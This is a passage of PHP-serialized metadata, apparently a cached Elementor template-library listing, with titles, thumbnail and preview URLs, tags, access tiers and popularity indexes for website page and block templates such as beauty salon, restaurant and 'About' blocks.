Coach\"]\";s:10:\"menu_order\";i:55;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:317;a:19:{s:4:\"tmpl\";i:1187;s:2:\"id\";i:18528;s:5:\"title\";s:36:\"Home Decor Store &#8211; Coming Soon\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Home-Decore.png\";s:12:\"tmpl_created\";i:1617541784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/home-decor-store-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:57:\"[\"Coming Soon\",\"Decor\",\"Interior Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:56;s:16:\"popularity_index\";i:872;s:11:\"trend_index\";i:819;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:318;a:19:{s:4:\"tmpl\";i:1243;s:2:\"id\";i:21135;s:5:\"title\";s:28:\"Construction &#8211; Service\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/13-Service-Construction.jpg\";s:12:\"tmpl_created\";i:1638823202;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/construction-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:48:\"[\"Architecture\",\"Construction\",\"Faq\",\"Services\"]\";s:10:\"menu_order\";i:56;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:319;a:19:{s:4:\"tmpl\";i:501;s:2:\"id\";i:5429;s:5:\"title\";s:8:\"About 16\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_4.png\";s:12:\"tmpl_created\";i:1520443510;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-16/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:56;s:16:\"popularity_index\";i:59;s:11:\"trend_index\";i:8;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:320;a:19:{s:4:\"tmpl\";i:1174;s:2:\"id\";i:17504;s:5:\"title\";s:29:\"Hair Stylist &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/02/250x280-3.png\";s:12:\"tmpl_created\";i:1612883014;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/hair-stylist-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:59:\"[\"Business\",\"Hair\",\"hairdresser\",\"Landing Pages\",\"Stylist\"]\";s:10:\"menu_order\";i:57;s:16:\"popularity_index\";i:840;s:11:\"trend_index\";i:806;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:321;a:19:{s:4:\"tmpl\";i:1223;s:2:\"id\";i:20981;s:5:\"title\";s:37:\"Creative Digital Agency &#8211; About\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2021/12/6-About-Creative-Digital-Agency.jpg\";s:12:\"tmpl_created\";i:1638789303;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/creative-digital-agency-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:51:\"[\"About\",\"Advisor\",\"Creative\",\"Creative Portfolio\"]\";s:10:\"menu_order\";i:57;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:322;a:19:{s:4:\"tmpl\";i:1184;s:2:\"id\";i:18449;s:5:\"title\";s:45:\"Aesthetic Clinic &#8211; Health &amp; Fitness\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2021/03/Aesthetic-Clinic.png\";s:12:\"tmpl_created\";i:1616682181;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/lp/aesthetic-clinic-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:57:\"[\"Aesthetic\",\"Beauty\",\"Fitness\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:58;s:16:\"popularity_index\";i:859;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:323;a:19:{s:4:\"tmpl\";i:1221;s:2:\"id\";i:20926;s:5:\"title\";s:33:\"Doctors Online Consultation -Home\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/12/4-Home-Doctors-Online-Consultation.jpg\";s:12:\"tmpl_created\";i:1638787371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/doctors-online-consultation-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:35:\"[\"App\",\"Health\",\"Medical\",\"Online\"]\";s:10:\"menu_order\";i:58;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:324;a:19:{s:4:\"tmpl\";i:505;s:2:\"id\";i:5464;s:5:\"title\";s:8:\"About 17\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_6.png\";s:12:\"tmpl_created\";i:1520443518;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-17/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:58;s:16:\"popularity_index\";i:220;s:11:\"trend_index\";i:142;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:325;a:19:{s:4:\"tmpl\";i:1165;s:2:\"id\";i:17353;s:5:\"title\";s:44:\"Online Cooking Course &#8211; Online Service\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/02/250x280-2.png\";s:12:\"tmpl_created\";i:1612705144;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/lp/online-cooking-course-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:50:\"[\"Cooking\",\"Course Online\",\"Food\",\"Landing Pages\"]\";s:10:\"menu_order\";i:59;s:16:\"popularity_index\";i:845;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:326;a:19:{s:4:\"tmpl\";i:1188;s:2:\"id\";i:18550;s:5:\"title\";s:39:\"Online Store &#8211; Under Construction\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Online-Store.png\";s:12:\"tmpl_created\";i:1617542506;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/lp/online-store-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:18:\"Under Construction\";s:4:\"tags\";s:59:\"[\"Landing Pages\",\"Online Shop\",\"Shop\",\"Under Construction\"]\";s:10:\"menu_order\";i:60;s:16:\"popularity_index\";i:832;s:11:\"trend_index\";i:600;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:327;a:19:{s:4:\"tmpl\";i:1250;s:2:\"id\";i:22140;s:5:\"title\";s:33:\"Design School &#8211; Coming Soon\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/05/250x280-1.png\";s:12:\"tmpl_created\";i:1647177317;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/design-school-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:49:\"[\"Coming Soon\",\"Design\",\"Landing Pages\",\"School\"]\";s:10:\"menu_order\";i:60;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:328;a:19:{s:4:\"tmpl\";i:510;s:2:\"id\";i:5504;s:5:\"title\";s:8:\"About 18\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_9.png\";s:12:\"tmpl_created\";i:1520443528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-18/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:60;s:16:\"popularity_index\";i:104;s:11:\"trend_index\";i:46;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:329;a:19:{s:4:\"tmpl\";i:1191;s:2:\"id\";i:18539;s:5:\"title\";s:40:\"Travel Agency &#8211; Under Construction\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Travel-Agency-1.png\";s:12:\"tmpl_created\";i:1617610273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/travel-agency-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Under Construction\";s:4:\"tags\";s:56:\"[\"Agency\",\"Landing Pages\",\"Travel\",\"Under Construction\"]\";s:10:\"menu_order\";i:61;s:16:\"popularity_index\";i:876;s:11:\"trend_index\";i:652;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:330;a:19:{s:4:\"tmpl\";i:1175;s:2:\"id\";i:18270;s:5:\"title\";s:24:\"Open week &#8211; Events\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/03/250x280.png\";s:12:\"tmpl_created\";i:1614767186;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/lp/open-week-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:59:\"[\"Education\",\"Event\",\"Events\",\"Landing Pages\",\"University\"]\";s:10:\"menu_order\";i:62;s:16:\"popularity_index\";i:831;s:11:\"trend_index\";i:673;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:331;a:19:{s:4:\"tmpl\";i:1177;s:2:\"id\";i:18300;s:5:\"title\";s:30:\"Makeup Artist &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/03/250x280-2.png\";s:12:\"tmpl_created\";i:1614768608;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/makeup-artist-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:79:\"[\"Beauty\",\"Business\",\"Course Online\",\"Landing Pages\",\"Makeup\",\"Online Service\"]\";s:10:\"menu_order\";i:63;s:16:\"popularity_index\";i:861;s:11:\"trend_index\";i:783;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:332;a:19:{s:4:\"tmpl\";i:511;s:2:\"id\";i:5515;s:5:\"title\";s:8:\"About 19\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_9.png\";s:12:\"tmpl_created\";i:1520443530;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-19/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:63;s:16:\"popularity_index\";i:268;s:11:\"trend_index\";i:161;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:333;a:19:{s:4:\"tmpl\";i:1179;s:2:\"id\";i:18329;s:5:\"title\";s:63:\"Online Real Estate Investment Conference &#8211; Online Service\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/03/250x280-5.png\";s:12:\"tmpl_created\";i:1614770404;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:157:\"https://library.elementor.com/lp/online-real-estate-investment-conference-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:76:\"[\"Conference\",\"Event\",\"Events\",\"Landing Pages\",\"Online Event\",\"Real estate\"]\";s:10:\"menu_order\";i:64;s:16:\"popularity_index\";i:866;s:11:\"trend_index\";i:779;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:334;a:19:{s:4:\"tmpl\";i:506;s:2:\"id\";i:5472;s:5:\"title\";s:7:\"About 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_7.png\";s:12:\"tmpl_created\";i:1520443520;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/about-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:64;s:16:\"popularity_index\";i:210;s:11:\"trend_index\";i:116;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:335;a:19:{s:4:\"tmpl\";i:1183;s:2:\"id\";i:18391;s:5:\"title\";s:45:\"Children&#8217;s Optometrist &#8211; Business\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2021/03/Library-Pic-Childrens-Optometrist.png\";s:12:\"tmpl_created\";i:1614773564;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/lp/childrens-optometrist-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:85:\"[\"Business\",\"Children\",\"Eye\",\"Glasses\",\"Health\",\"Kids\",\"Landing Pages\",\"Optometrist\"]\";s:10:\"menu_order\";i:65;s:16:\"popularity_index\";i:877;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:336;a:19:{s:4:\"tmpl\";i:1182;s:2:\"id\";i:18366;s:5:\"title\";s:30:\"Car Insurance &#8211; Business\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/03/Library-Pic-Car-Insurance.png\";s:12:\"tmpl_created\";i:1614773263;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/car-insurance-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:46:\"[\"Business\",\"car\",\"Insurance\",\"Landing Pages\"]\";s:10:\"menu_order\";i:66;s:16:\"popularity_index\";i:869;s:11:\"trend_index\";i:797;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:337;a:19:{s:4:\"tmpl\";i:1201;s:2:\"id\";i:19144;s:5:\"title\";s:25:\"Birthday Party Invitation\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/06/250x280.png\";s:12:\"tmpl_created\";i:1623848691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/birthday-party-invitation/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:67:\"[\"Birthday\",\"Event\",\"Landing Pages\",\"Party\",\"RSVD\",\"Save the Date\"]\";s:10:\"menu_order\";i:66;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:338;a:19:{s:4:\"tmpl\";i:1124;s:2:\"id\";i:16473;s:5:\"title\";s:26:\"Beauty Salon &#8211; About\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/12/about-1.jpg\";s:12:\"tmpl_created\";i:1608622373;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/beauty-salon-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:67;s:16:\"popularity_index\";i:615;s:11:\"trend_index\";i:184;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:339;a:19:{s:4:\"tmpl\";i:1176;s:2:\"id\";i:18291;s:5:\"title\";s:47:\"Grill Restaurant Food Delivery &#8211; Business\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/03/Library-Pic-Food-Delivery-LP.png\";s:12:\"tmpl_created\";i:1614767830;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/lp/grill-restaurant-food-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:79:\"[\"Delivery\",\"Delivery Service\",\"Fast Food\",\"Food\",\"Landing Pages\",\"Restaurant\"]\";s:10:\"menu_order\";i:67;s:16:\"popularity_index\";i:819;s:11:\"trend_index\";i:685;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:340;a:19:{s:4:\"tmpl\";i:504;s:2:\"id\";i:5455;s:5:\"title\";s:8:\"About 20\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_6.png\";s:12:\"tmpl_created\";i:1520443516;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-20/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:67;s:16:\"popularity_index\";i:134;s:11:\"trend_index\";i:70;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:341;a:19:{s:4:\"tmpl\";i:1125;s:2:\"id\";i:16488;s:5:\"title\";s:28:\"Beauty Salon &#8211; Contact\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/12/contact.jpg\";s:12:\"tmpl_created\";i:1608622374;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/beauty-salon-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:68;s:16:\"popularity_index\";i:548;s:11:\"trend_index\";i:101;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:342;a:19:{s:4:\"tmpl\";i:1180;s:2:\"id\";i:18340;s:5:\"title\";s:30:\"Restaurant &#8211; Coming Soon\";s:9:\"thumbnail\";s:98:\"https://library.elementor.com/wp-content/uploads/2021/03/Library-Pic-Restuarant-Coming-Soon-LP.png\";s:12:\"tmpl_created\";i:1614772183;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/restaurant-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:51:\"[\"Coming Soon\",\"Food\",\"Landing Pages\",\"Restaurant\"]\";s:10:\"menu_order\";i:68;s:16:\"popularity_index\";i:810;s:11:\"trend_index\";i:809;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:343;a:19:{s:4:\"tmpl\";i:499;s:2:\"id\";i:5413;s:5:\"title\";s:8:\"About 21\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_2.png\";s:12:\"tmpl_created\";i:1520443507;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-21/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:68;s:16:\"popularity_index\";i:83;s:11:\"trend_index\";i:52;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:344;a:19:{s:4:\"tmpl\";i:1126;s:2:\"id\";i:16496;s:5:\"title\";s:28:\"Beauty Salon &#8211; Gallery\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/12/gallery-1.jpg\";s:12:\"tmpl_created\";i:1608622379;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/beauty-salon-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:69;s:16:\"popularity_index\";i:491;s:11:\"trend_index\";i:90;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:345;a:19:{s:4:\"tmpl\";i:1173;s:2:\"id\";i:17480;s:5:\"title\";s:42:\"At-home Massage Therapist &#8211; Business\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/02/At-Home-Massage-Therapist.jpg\";s:12:\"tmpl_created\";i:1612879264;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/at-home-massage-therapist-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:60:\"[\"Business\",\"Health\",\"Landing Pages\",\"Services\",\"Therapist\"]\";s:10:\"menu_order\";i:69;s:16:\"popularity_index\";i:856;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:346;a:19:{s:4:\"tmpl\";i:1127;s:2:\"id\";i:16457;s:5:\"title\";s:25:\"Beauty Salon &#8211; 